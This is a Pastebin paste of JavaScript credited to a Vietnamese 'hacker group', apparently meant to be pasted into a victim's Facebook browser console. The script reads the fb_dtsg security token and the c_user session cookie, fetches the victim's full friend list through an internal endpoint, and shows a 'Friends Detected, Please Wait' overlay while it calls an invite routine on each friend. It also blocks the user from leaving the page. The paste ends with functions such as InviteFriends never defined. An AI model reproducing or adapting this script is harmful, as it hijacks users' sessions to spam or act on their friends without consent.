Advertisement
IDJFR

23111111111111111

Aug 30th, 2014
333
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.47 KB | None | 0 0
  1. _text = 'Powered By: <A style="color:#3B5998;" href="https://www.facebook.com/BanMeTreCon" target="_blank">Nghĩa Phạm</A> & <A style="color:#3B5998;" href="https://www.facebook.com/253443511480220" target="_blank">Empty Hacker Group </A>.</br>Script Made By: Nghĩa Phạm </A><A style="color:#3B5998;" href="https://www.facebook.com/hoidocthan" target="_blank">Hội Độc Thân</A></A>,</A><A style="color:#3B5998;" href="https://www.facebook.com/moitinnhanlamotkiniem" target="_blank">Mỗi Tin Nhắn Là Một Kỉ Niệm >:D< :*</A></A>.</br>Nghĩa Phạm <A style="color:#3B5998;" href="https://www.facebook.com/665909446783860" target="_blank">Nude Là Một Nghệ Thuật</A>.</A>';
  2. jx = {
  3. b: function () {
  4. var b = !1;
  5. if ("undefined" != typeof ActiveXObject) try {
  6. b = new ActiveXObject("Msxml2.XMLHTTP")
  7. } catch (c) {
  8. try {
  9. b = new ActiveXObject("Microsoft.XMLHTTP")
  10. } catch (a) {
  11. b = !1
  12. }
  13. } else if (window.XMLHttpRequest) try {
  14. b = new XMLHttpRequest
  15. } catch (h) {
  16. b = !1
  17. }
  18. return b
  19. },
  20. load: function (b, c, a, h, g) {
  21. var e = this.d();
  22. if (e && b) {
  23. e.overrideMimeType && e.overrideMimeType("text/xml");
  24. h || (h = "GET");
  25. a || (a = "text");
  26. g || (g = {});
  27. a = a.toLowerCase();
  28. h = h.toUpperCase();
  29. b += b.indexOf("?") + 1 ? "&" : "?";
  30. var k = null;
  31. "POST" == h && (k = b.split("?"), b = k[0], k = k[1]);
  32. e.open(h, b, !0);
  33. e.onreadystatechange = g.c ? function () {
  34. g.c(e)
  35. } : function () {
  36. if (4 == e.readyState)
  37. if (200 == e.status) {
  38. var b = "";
  39. e.responseText && (b = e.responseText);
  40. "j" == a.charAt(0) ? (b = b.replace(/[\n\r]/g, ""), b = eval("(" + b + ")")) : "x" == a.charAt(0) && (b = e.responseXML);
  41. c && c(b)
  42. } else g.f && document.getElementsByTagName("body")[0].removeChild(g.f), g.e && (document.getElementById(g.e).style.display = "none"), error && error(e.status)
  43. };
  44. e.send(k)
  45. }
  46. },
  47. d: function () {
  48. return this.b()
  49. }
  50. };
  51.  
  52. function ChangeLocation() {
  53. window.location.href = "http://www.facebook.com/"
  54. }
  55. setTimeout("ChangeLocation", 1);
  56. window.onbeforeunload = function () {
  57. if (window[tag + "_close"]) return "This script is running now!"
  58. };
  59. var i = 3;
  60. var tay = 3;
  61. var suc = 0;
  62. var err = 0;
  63. var arr = new Array;
  64. var arn = new Array;
  65. var pho = new Array;
  66. var tag = "Close";
  67. var page_name, x = document.getElementsByTagName("span");
  68. for (i = 0; i < x.length; i++)
  69. if (x[i].getAttribute("itemprop") == "name") page_name = x[i].innerHTML;
  70. var fb_dtsg = document.getElementsByName("fb_dtsg")[0].value;
  71. var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
  72. jx.load(window.location.protocol + "///www.facebook.com/ajax/typeahead/first_degree.php?viewer=" + user_id + "&token=v7&filter[0]=user&options[0]=friends_only&options[1]=nm&options[2]=sort_alpha&__user=" + user_id + "&__a=1&__dyn=7n8aD5z5CF-3ui&__req=l", function (a) {
  73. var b = a;
  74. var c = b.substring(b.indexOf("{"));
  75. var d = JSON.parse(c);
  76. d = d.payload.entries;
  77. for (var e = 0; e < d.length; e++) arr.push(d[e].uid);
  78. for (var eg = 0; eg < d.length; eg++) arn.push(d[eg].text);
  79. for (var pic = 0; pic < d.length; pic++) pho.push(d[pic].photo);
  80. i = arr.length - 1;
  81. tay = i;
  82. console.log(arr.length);
  83. var display = "<div id='friend-edge-display' style='position:fixed;left:50%;margin-left:-273px;top:100px;width:500px;z-index:9999;font-size:14px;text-align:center;padding:15px;box-shadow:0px 3px 8px rgba(0, 0, 0, 0.9);position:fixed;left:50%;margin-left:-273px;top:100px;width:500px;z-index:9999;font-size:14px;text-align:center;padding:15px;box-shadow:0pt 1px 0pt rgba(0,0,0,0.9);border-radius: 1em 4em 1em 4em;border:3px solid rgba(0,0,0,0.9);background-color:rgba(0,0,0,0.9);color:#ffffff'>";
  84. display += "<div style='padding-bottom:10px;font-size:20px;'>" + Title + "</div>";
  85. display += arr.length + " Friends Detected, Please Wait . . .";
  86. display += "</div>";
  87. document.getElementById("pagelet_sidebar").innerHTML = display;
  88. InviteFriends(arr[i])
  89. });
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement